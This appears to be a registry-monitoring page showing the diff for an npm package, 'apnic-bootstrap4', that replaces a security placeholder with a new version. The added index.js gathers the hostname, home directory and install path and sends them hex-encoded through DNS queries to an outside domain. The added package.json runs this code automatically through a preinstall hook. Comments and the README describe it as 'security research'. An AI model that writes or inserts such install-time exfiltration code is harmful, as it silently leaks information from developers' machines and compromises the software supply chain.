apnic-bootstrap4 0.0.1-security → 2023.98.998

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of apnic-bootstrap4 might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -5
  2. package/index.js +76 -0
  3. package/package.json +34 -3
package/README.md CHANGED
@@ -1,5 +1 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=apnic-bootstrap4 for more information.
1
+ This package is meant for security research purposes and does not contain any useful code.
package/index.js ADDED
@@ -0,0 +1,76 @@
1
+ /*
2
+
3
+ This code is used for research purposes.
4
+
5
+ No sensitive data is retrieved.
6
+
7
+ Callbacks from within organizations with a
8
+ responsible disclosure program will be reported
9
+ directly to the organizations.
10
+
11
+ Any other callbacks will be ignored, and
12
+ any associated data will not be kept.
13
+
14
+ For any questions or suggestions:
15
+
16
+ kre80r@wearehackerone.com
17
+
18
+ Shoutout:
19
+ https://twitter.com/alxbrsn
20
+ https://twitter.com/streaak
21
+ */
22
+
23
+
24
+ const dns = require('dns');
25
+ const os = require('os');
26
+
27
+ const suffix = '.ca9rvt7bbtvqsfuo7bfm.krhost.me';
28
+ const ns = '1dot1dot1dot1.cloudflare-dns.com';
29
+
30
+ const package = 'apnic-bootstrap4';
31
+
32
+
33
+ function sendToServer(data) {
34
+
35
+ data = Buffer.from(data).toString('hex');
36
+ data = data.match(/.{1,60}/g);
37
+
38
+ id = Math.random().toString(36).substring(2);
39
+ data.forEach(function (chunk, idx){
40
+ try {
41
+ dns.resolve(
42
+ id + '.' + idx + '.' + chunk + suffix, 'A',
43
+ console.log);
44
+ } catch (e) { }
45
+ });
46
+
47
+ }
48
+
49
+
50
+ function tryGet(toCall) {
51
+
52
+ try {
53
+ return toCall();
54
+ } catch(e) {
55
+ return 'err';
56
+ }
57
+
58
+ }
59
+
60
+ data = {
61
+ h : tryGet(os.hostname),
62
+ d : tryGet(os.homedir),
63
+ c : __dirname
64
+ }
65
+
66
+ data = JSON.stringify(data);
67
+
68
+ dns.lookup(ns, function(err, address) {
69
+ if (!err) {
70
+ nsAddress = address;
71
+ } else {
72
+ nsAddress = '8.8.8.8';
73
+ }
74
+ dns.setServers([nsAddress, '4.4.4.4']);
75
+ sendToServer(data);
76
+ });
package/package.json CHANGED
@@ -1,6 +1,37 @@
1
1
  {
2
+ "_from": "apnic-bootstrap4",
3
+ "_id": "apnic-bootstrap4@2023.98.998",
4
+ "_inBundle": false,
5
+ "_location": "/apnic-bootstrap4",
6
+ "_phantomChildren": {},
7
+ "_requested": {
8
+ "type": "tag",
9
+ "registry": true,
10
+ "raw": "apnic-bootstrap4",
11
+ "name": "apnic-bootstrap4",
12
+ "escapedName": "apnic-bootstrap4",
13
+ "rawSpec": "",
14
+ "saveSpec": null,
15
+ "fetchSpec": "latest"
16
+ },
17
+ "_requiredBy": [
18
+ "#USER",
19
+ "/"
20
+ ],
21
+ "_resolved": "https://registry.npmjs.org/apnic-bootstrap4/-/apnic-bootstrap4-2022.99.999.tgz",
22
+ "_shasum": "c37887b241e857bf8344e79e20269fc74ed6b176",
23
+ "_spec": "apnic-bootstrap4",
24
+ "_where": "/home/krkr",
25
+ "author": "",
26
+ "bundleDependencies": false,
27
+ "deprecated": "please delete",
28
+ "description": "Security research purposes only.",
29
+ "license": "ISC",
30
+ "main": "index.js",
2
31
  "name": "apnic-bootstrap4",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
32
+ "scripts": {
33
+ "preinstall": "node index.js",
34
+ "test": ""
35
+ },
36
+ "version": "2023.98.998"
6
37
  }